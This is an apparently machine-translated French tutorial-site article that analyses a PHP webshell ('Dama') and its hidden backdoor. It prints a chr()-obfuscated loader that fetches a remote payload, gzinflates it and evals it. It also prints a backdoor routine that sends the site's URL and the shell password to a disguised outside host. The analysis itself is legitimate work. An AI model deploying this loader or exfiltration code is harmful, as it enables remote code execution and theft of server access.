Maison >développement back-end >Problème PHP >Qu'est-ce que PHP Malaisie

Qu'est-ce que PHP Malaisie

(*-*)浩
(*-*)浩original
2019-10-09 13:51:135556parcourir

DaMa : fait référence au virus cheval de Troie ; php Dama est un programme écrit en PHP pour extraire les autorisations du site car il a pour fonction d'élever des droits ou de modifier le site, il est appelé cheval de Troie.

Qu'est-ce que PHP Malaisie

Quelqu'un a partagé un php Malaisie (a dit que c'était via WAF), dont 80% a une porte dérobée, et moi a fait une brève analyse (Apprentissage recommandé : Tutoriel vidéo PHP)

<?php
      $password=&#39;Shiqi&#39;;//登录密码(支持菜刀)
//----------功能程序------------------//
$c="chr";
session_start();
if(empty($_SESSION[&#39;PhpCode&#39;])){
$url=$c(104).$c(116).$c(116).$c(112).$c(58).$c(47);
$url.=$c(47).$c(105).$c(46).$c(110).$c(105).$c(117);
$url.=$c(112).$c(105).$c(99).$c(46).$c(99).$c(111);
$url.=$c(109).$c(47).$c(105).$c(109).$c(97).$c(103);
$url.=$c(101).$c(115).$c(47).$c(50).$c(48).$c(49).$c(55);
$url.=$c(47).$c(48).$c(53).$c(47).$c(50).$c(49).$c(47);
$url.=$c(118).$c(49).$c(81).$c(82).$c(49).$c(77).$c(46).$c(103).$c(105).$c(102);
$get=chr(102).chr(105).chr(108).chr(101).chr(95);
$get.=chr(103).chr(101).chr(116).chr(95).chr(99);
$get.=chr(111).chr(110).chr(116).chr(101).chr(110);
$get.=chr(116).chr(115);
$_SESSION[&#39;PhpCode&#39;]=$get($url);}
$un=$c(103).$c(122).$c(105).$c(110);
$un.=$c(102).$c(108).$c(97).$c(116).$c(base64_decode(&#39;MTAx&#39;));
@eval($un($_SESSION[&#39;PhpCode&#39;]));
?>

Il y a trois variables au total, $url, $get, $un Tout d'abord, convertissez plusieurs variables en ascii. en chaînes pour voir ce que c'est, utilisez simplement echo pour le sortir.

Quest-ce que PHP Malaisie

C'est un simple cryptage basé sur base64 plus gzinflate

Partie porte dérobée :

if(isset($_GET[&#39;login&#39;])==&#39;geturl&#39;){

    @set_time_limit(10);

    $serveru = $_SERVER [&#39;HTTP_HOST&#39;].$_SERVER[&#39;PHP_SELF&#39;];

    $serverp = envlpass;

    $copyurl = base64_decode(&#39;SFRUUDovL1dXVy5GQUNFQjBPSy5DQy9lcnJvci5waHA/bmFtZT0=&#39;);

    $url=$copyurl.$serveru.&#39;&pass=&#39;.$serverp;

    $url=urldecode($url);

    GetHtml($url);

}

function geturl(){

    @set_time_limit(10);

    $serveru = $_SERVER [&#39;HTTP_HOST&#39;].$_SERVER[&#39;PHP_SELF&#39;];

    $serverp = envlpass;

    $copyurl = base64_decode(&#39;&#39;);

    $url=$copyurl.$serveru.&#39;&p=&#39;.$serverp;

    $url=urldecode($url);

    GetHtml($url);

}

Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!

Déclaration:
Le contenu de cet article est volontairement contribué par les internautes et les droits d'auteur appartiennent à l'auteur original. Ce site n'assume aucune responsabilité légale correspondante. Si vous trouvez un contenu suspecté de plagiat ou de contrefaçon, veuillez contacter admin@php.cn